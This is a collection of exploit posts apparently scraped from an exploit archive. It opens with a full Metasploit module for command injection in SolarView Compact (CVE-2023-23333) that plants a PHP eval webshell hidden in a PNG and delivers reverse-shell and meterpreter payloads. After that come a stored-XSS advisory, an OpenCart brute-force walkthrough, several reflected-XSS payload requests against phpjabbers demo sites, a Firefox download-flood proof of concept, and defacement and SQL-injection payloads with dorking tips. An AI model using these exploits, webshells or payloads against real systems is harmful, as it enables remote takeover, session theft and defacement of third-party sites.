<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::Format::PhpPayloadPng<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'SolarView Compact unauthenticated remote command execution vulnerability.',<br /> 'Description' => %q{<br /> CONTEC's SolarView™ Series enables you to monitor and visualize solar power and is only available in Japan.<br /> This module exploits a command injection vulnerability on the SolarView Compact `v6.00` web application<br /> via vulnerable endpoint `downloader.php`.<br /> After exploitation, an attacker will have full access with the same user privileges under<br /> which the webserver is running (typically as user `contec`).<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF module contributor<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-23333'],<br /> ['URL', 'https://attackerkb.com/topics/kE3lzTZGV2/cve-2023-23333']<br /> ],<br /> 'DisclosureDate' => '2023-05-15',<br /> 'Platform' => ['php', 'unix', 'linux'],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_ARMLE, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'PHP',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP,<br /> 'Type' => :php,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => ['wget', 'printf', 'echo', 'bourne'],<br /> 'Linemax' => 65535,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 80,<br /> 'SSL' => false,<br /> 'HttpClientTimeout' => 40 # set to 40 seconds because http response is pretty slow.<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [ true, 'The SolarView endpoint URL', '/' ]),<br /> OptString.new('WEBSHELL', [<br /> false, 'The name of the webshell with extension. Webshell name will be randomly generated if left unset.', nil<br /> ], conditions: %w[TARGET == 0])<br /> ])<br /> end<br /><br /> def upload_webshell<br /> # randomize file name if option WEBSHELL is not set<br /> @webshell_name = if datastore['WEBSHELL'].blank?<br /> "#{Rex::Text.rand_text_alpha(8..16)}.php"<br /> else<br /> datastore['WEBSHELL'].to_s<br /> end<br /><br /> @post_param = Rex::Text.rand_text_alphanumeric(1..8)<br /><br /> # inject PHP payload into the PLTE chunk of a PNG image to hide the payload<br /> php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"<br /> png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')<br /> return nil if png_webshell.nil?<br /><br /> # encode webshell data and write to file on the target at the tmp directory for execution<br /> # the tmp directory is writeable and a symbolic link to /tmp in a standard solarview installation<br /> payload = Base64.strict_encode64(png_webshell.to_s)<br /> cmd = "echo #{payload}|base64 -d >tmp/#{@webshell_name}"<br /> return execute_command(cmd)<br /> end<br /><br /> def execute_php(cmd, _opts = {})<br /> payload = Base64.strict_encode64(cmd)<br /> return send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'tmp', @webshell_name),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'vars_post' => {<br /> @post_param => payload<br /> }<br /> })<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # Encode payload with base64 to ensure proper execution<br /> payload = Base64.strict_encode64(cmd)<br /> cmd = "echo #{payload}|base64 -d|bash"<br /> return send_request_cgi({<br /> 'method' => 'GET',<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'uri' => normalize_uri(target_uri.path, 'downloader.php'),<br /> 'vars_get' => {<br /> 'file' => ";#{cmd};.zip"<br /> }<br /> })<br /> end<br /><br /> def check<br /> # Checking if the target is vulnerable by echoing a randomised marker that will return the marker in the response.<br /> # next we will try to read the version file stored in /opt/svc/version<br /> print_status("Checking if #{peer} can be exploited.")<br /> marker = Rex::Text.rand_text_alphanumeric(8..16)<br /> res = execute_command("echo #{marker};cat /opt/svc/version")<br /> if res && res.code == 200 && res.body.include?(marker)<br /> CheckCode::Vulnerable(res.body.match(/SolarView Compact ver\.\d\.\d\d/).to_s)<br /> else<br /> CheckCode::Safe('No valid response received from the target.')<br /> end<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :php<br /> res = upload_webshell<br /> fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200<br /> register_file_for_cleanup(@webshell_name.to_s)<br /> execute_php(payload.encoded)<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> # Don't check the response here since the server won't respond<br /> # if the payload is successfully executed.<br /> execute_cmdstager({ linemax: target.opts['Linemax'] })<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>Vulnerability Summary from Wordfence Intelligence<br /><br />Description: Newsletter <= 7.8.9 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode <br /><br />Affected Plugin: Newsletter – Send awesome emails from WordPress<br /><br />Plugin Slug: newsletter<br /><br />Affected Versions: <= 7.8.9<br /><br />CVE ID: CVE-2023-4772<br /><br />CVSS Score: 6.4 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Lana Codes <br /><br />Fully Patched Version: 7.9.0<br /><br />The Newsletter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘newsletter_form’ shortcode in versions up to, and including, 7.8.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.<br /><br />Technical Analysis<br /><br />The Newsletter plugin is a newsletter and email marketing system, with a drag and drop newsletter builder and many other features. It provides a shortcode ([newsletter_form]) that displays the newsletter subscription form when added to a WordPress page.<br /><br />Unfortunately, insecure implementation of the plugin’s shortcode functionality allows for the injection of arbitrary web scripts into these pages. Examining the code reveals that the shortcode has two types, one of which is the get_subscription_form_minimal method handling the minimal type in the NewsletterSubscription class. In vulnerable versions, this method does not adequately sanitize the user-supplied ‘class’ input, and also does not adequately escape the ‘class’ output when it displays the form. This makes it possible to inject attribute-based Cross-Site Scripting payloads via the ‘class’ attribute.<br /><br />[View this code snippet on the blog.] <br /><br />This makes it possible for threat actors to carry out stored XSS attacks. Once a script is injected into a page or post, it will execute each time a user accesses the affected page. While this vulnerability does require that a trusted contributor account is compromised, or that a user be able to register as a contributor, successful threat actors could steal sensitive information, manipulate site content, inject administrative users, edit files, or redirect users to malicious websites which are all severe consequences.<br /><br />Shortcode Exploit Possibilities<br /><br />Some previous versions of WordPress contained a vulnerability that allowed shortcodes supplied by unauthenticated commenters to be rendered in certain rare configurations, though the vast majority of sites have been automatically upgraded to a patched release of WordPress as of this writing.<br /><br />Disclosure Timeline<br /><br />August 16, 2023 – Wordfence Threat Intelligence team discovers the stored XSS vulnerability in Newsletter.<br /><br />August 16, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.<br /><br />August 17, 2023 – The vendor confirms the inbox for handling the discussion.<br /><br />August 17, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.<br /><br />August 17, 2023 – The fully patched version, 7.9.0, is released.<br /><br />Conclusion<br /><br />In this blog post, we have detailed a stored XSS vulnerability within the Newsletter plugin affecting versions 7.8.9 and earlier. This vulnerability allows authenticated threat actors with contributor-level permissions or higher to inject malicious web scripts into pages that execute when a user accesses an affected page. The vulnerability has been fully addressed in version 7.9.0 of the plugin.<br /><br />We encourage WordPress users to verify that their sites are updated to the latest patched version of Newsletter.<br /><br />All Wordfence users, including those running Wordfence Premium, Wordfence Care, and Wordfence Response, as well as sites still running the free version of Wordfence, are fully protected against this vulnerability.<br /><br />If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.<br /><br />For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.<br /><br /></code></pre>
<pre><code># Exploit Title: OpenCart CMS v4.0.2.2 Login Vulnerability<br /># Date: 5-9-2023<br /># Category: Web Application [CMS]<br /># Exploit Author: Rajdip Dey Sarkar<br /># Version: 4.0.2.2<br /># Tested on: Windows/Kali<br /># CVE: CVE-2023-40834<br /><br /><br /><br />Description:<br />----------------<br />OpenCart CMS version 4.0.2.2 is susceptible to login brute-force attacks,<br />where attackers can repeatedly try to guess login credentials without any<br />protective mechanisms in place.<br /><br /><br />Vulnerable Parameter:<br />-----------------------<br />`Password`<br /><br /><br />Steps to reproduce:<br />---------------------<br />> Initial Login Attempt: An attacker visits the login page `<br />http://localhost/opencart-4.0.2.2/index.php?route=account/login&language=en-gb`<br /><http://localhost/opencart-4.0.2.2/index.php?route=account/login&language=en-gb><br />and<br />enters a valid username along with an incorrect password to trigger an<br />authentication attempt.<br /><br />> Request Capture: The attacker intercepts the HTTP request sent to the<br />server during the failed login attempt using tools like proxy servers. This<br />captured request contains the authentication details.<br /><br />> Request Modification: The attacker uses a tool like "Intruder" to<br />automate the process of submitting multiple password variations. They<br />modify the captured request to include different passwords, including the<br />correct one, to be used in the brute force attack.<br /><br />> Brute Force Attack: The attacker launches the brute force attack by<br />sending the modified requests with different password combinations to the<br />server. They analyze the responses to identify differences in response<br />lengths or messages that reveal the correct password, account lockout<br />information, or other vulnerabilities.<br /></code></pre>
<pre><code>## Title: Cleaning Business Software-1.0 XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 09/06/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/cleaning-business-software/#sectionDemo<br />## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected<br /><br />## Description:<br />The value of the index request parameter is copied into the value of<br />an HTML tag attribute which is encapsulated in double quotation marks.<br />The payload ys2hj"><script>alert(1)</script>u8zwj was submitted in the<br />index parameter. This input was echoed unmodified in the application's<br />response.<br />The attacker can get all cookie information about the user session!<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Testing Payload:<br />```GET<br />GET /1693971587_409/index.php?controller=pjFront&action=pjActionServices&locale=1&index=3514ys2hj%22%3e%3cscript%3ealert(1)%3c%2fscript%3eu8zwj<br />HTTP/1.1<br />Host: demo.phpjabbers.com<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: CleaningBusiness=v1s3db2187im339fcbqifuabg7<br />Origin: http://demo.phpjabbers.com<br />Referer: http://demo.phpjabbers.com/<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Cleaning-Business-Software-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/09/cleaning-business-software-10-xss.html)<br /><br />## Time spent:<br />00:25:00<br /><br /></code></pre>
<pre><code>## Title: Event Booking Calendar-4.0 XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 09/06/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/event-booking-calendar/#sectionDemo<br />## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected<br /><br />## Description:<br />The value of the index request parameter is copied into the value of<br />an HTML tag attribute which is encapsulated in double quotation marks.<br />The payload ap5yf"><script>alert(1)</script>n9d5d was submitted in the<br />index parameter. This input was echoed unmodified in the application's<br />response.<br />The attacker can make a specially crafted malicious URL and spread it<br />into the network, to infect every user of this system who clicks on it<br />and visit it.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Testing Payload:<br />```GET<br />GET /1693985138_790/index.php?controller=pjFrontPublic&action=pjActionLoadEvents&session_id=&theme=theme7&locale=1&hide=0&index=4786ap5yf%22%3e%3cscript%3ealert(1)%3c%2fscript%3en9d5d&show_header=1&show_icons=1&show_categories=1&category_id=0&month=09&year=2023&view=calendar&period=&page=1<br />HTTP/1.1<br />Host: demo.phpjabbers.com<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: _ga=GA1.2.1968270768.1693986414;<br />_gid=GA1.2.227754763.1693986414; _gat=1;<br />_fbp=fb.1.1693986413650.1548084853;<br />_ga_NME5VTTGTT=GS1.2.1693986413.1.0.1693986413.60.0.0<br />X-Requested-With: XMLHttpRequest<br />Referer: https://demo.phpjabbers.com/1693985138_790/preview.php?lid=1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Event-Booking-Calendar-4.0%20)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/09/event-booking-calendar-40-xss-reflected.html)<br /><br />## Time spent:<br />01:25:00<br /><br /><br /></code></pre>
<pre><code>This is barely a DoS, but since Chrome has explicit protection<br />against it, we decided to disclose it.<br /><br />If firefox user visits a specially crafted page, then firefox<br />may create many files in `~/Downloads`,<br />The user is notified about this in a small dialog, but there is<br />no option to stop the downloads.<br />The potential denial of service is that the user must manually<br />delete the created files and this might be PITA.<br /><br />Technically about the PoC: create non-empty file `xml.doc`.<br />To force download, add to the page `iframe src="xml.doc"`.<br />To force creation of new files, add `body onload="location.reload()"`<br />(there are several other options about this).<br /><br />[Proof of concept][1]<br /><br />To out surprise, Chrome is safe from this and it distinguishes<br />manual download from automated download and this might be because<br />it is aware about this DoS.<br /><br />Affected: firefox 117 on GNU/Linux and reportedly on Windows.<br />Not Affected: firefox on android, Chrome, lynx.<br /><br />[1]: https://j.ludost.net/y3.html<br /><br />--- poc y3.html ---<br /><br /><html><br /><body><br />Wait about 20 seconds andcheck for new files in ~/Downloads and also for message from firefox. Written by Georgi Guninski.<br /><iframe src="xml.doc" width=10 height=10></iframe><br /><script><br />setInterval(function () {location.reload()},1000);<br /></script><br /></body><br /></html><br /><br />--- poc y3.html ---<br /></code></pre>
<pre><code>## Title: Cinema Booking System-1.0 XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 09/05/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/car-rental-script/<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The name of an arbitrarily supplied URL parameter is copied into the<br />value of an HTML tag attribute which is encapsulated in double<br />quotation marks. The payload kfimq"><script>alert(1)</script>k0a57 was<br />submitted in the name of an arbitrarily supplied URL parameter. This<br />input was echoed unmodified in the application's response. The<br />attacker can trick all users of this system into visiting a very<br />DANGEROUS URL address, and the worst thing is when they try to log in<br />to this system, by using his malicious link!<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Testing Payload:<br />```<br />GET /1693939439_790/index.php/kfimq"><script>alert(1)</script>k0a57?controller=pjAdmin&action=pjActionLogin<br />HTTP/1.1<br />Host: demo.phpjabbers.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Cinema-Booking-System-1.0%20)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/09/cinema-booking-system-10-xss-reflected.html)<br /><br />## Time spent:<br />00:17:00<br /><br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : JZDCMS v1.3 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1(32-bit) | <br />| # Vendor : http://www.jz-designs.com/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : ci-now.php?id=177<marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />[+] http://127.0.0.1/collegeinsidercom/ci-now.php?id=177%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Infinity Market Classified Ads Script 1.6.2 xss via file uploads Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : https://codecanyon.net/item/classifieds-multipurpose-portal-infinity-market/16572285?s_rank=1520 | <br />| # Dork : "InfinityMarket MultiPurpose Script is a multi-solution product made with simplicity in mind so you can benefit " |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] singup your user & go to /index.php/frontend/myprofile/en#content<br /><br />[+] choose your file svg and upload it .<br /><br />[+] http://127.0.0.1/www/harajalshamcom/files/index.svg<br /><br />Greetings to :========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ImgHosting v1.3 Sql Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://codecanyon.net/user/FoxSash/?ref=FoxSash | <br />| # Dork : "ImgHosting Programming by FoxSash" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : ' in search box<br /><br />[+] http://target_site/sowrkcom/?search=1' <==== inject here<br /><br />[+] Login http://target_site/admin/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /><br /></code></pre>